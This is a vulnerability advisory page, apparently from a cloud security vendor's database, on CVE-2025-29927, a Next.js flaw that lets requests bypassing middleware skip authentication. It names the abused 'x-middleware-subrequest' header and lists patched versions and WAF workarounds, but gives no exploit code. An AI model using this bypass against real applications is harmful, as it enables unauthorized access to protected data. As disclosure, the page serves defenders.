Cloud Vulnerability DB
An open project to list all known cloud vulnerabilities and Cloud Service Provider security issues
Vulnerability DatabaseCVE-2025-29927
CVE-2025-29927:
JavaScript vulnerability analysis and mitigation
Overview
Next.js, a React framework for building full-stack web applications, disclosed a critical security vulnerability (CVE-2025-29927) that affects versions prior to 14.2.25 and 15.2.3. The vulnerability was discovered on February 27, 2025, and publicly disclosed on March 21, 2025. This security flaw affects self-hosted Next.js applications using middleware with 'next start' and 'output: standalone' configurations (GitHub Advisory, Next.js Blog).
Technical details
The vulnerability stems from the improper handling of an internal header 'x-middleware-subrequest' which Next.js uses to prevent recursive requests from triggering infinite loops. When this header is included in requests to protected routes, Next.js incorrectly allows the request to bypass middleware execution entirely, potentially circumventing critical security checks. The vulnerability has been assigned a CVSS v3.1 score of 9.1 (Critical) with a vector string of CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N, indicating high severity with potential for unauthorized access and data modification (JFrog Blog, GitHub Advisory).
Impact
The vulnerability can lead to authorization bypass in applications that rely on middleware for security checks. If successfully exploited, attackers could bypass authentication mechanisms, access protected routes, and potentially gain unauthorized access to sensitive information. In some cases, the vulnerability could also lead to cache poisoning and denial of service conditions (Rapid7 Blog, JFrog Blog).
Mitigation and workarounds
The vulnerability has been patched in versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3. If upgrading is not immediately possible, organizations can implement a workaround by preventing external user requests containing the x-middleware-subrequest header from reaching their Next.js application. This can be achieved through web server configurations or Web Application Firewall (WAF) rules. Cloudflare users can enable a managed WAF rule for protection (GitHub Advisory, JFrog Blog).
Community reactions
The vulnerability has garnered significant attention in the security community, with multiple security firms and researchers publishing detailed analyses. Next.js has acknowledged that while they published the CVE promptly, they 'missed the mark on partner communications' and are establishing a partner mailing list to improve future vulnerability communications (OSS Security).
Additional resources
Source: This report was generated using AI
Free Vulnerability Assessment
Benchmark your Cloud Security Posture
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
Ready to see Wiz in action?
“Best User Experience I have ever seen, provides full visibility to cloud workloads.”
David EstlickCISO
“Wiz provides a single pane of glass to see what is going on in our cloud environments.”
Adam FletcherChief Security Officer
“We know that if Wiz identifies something as critical, it actually is.”
Greg PoniatowskiHead of Threat and Vulnerability Management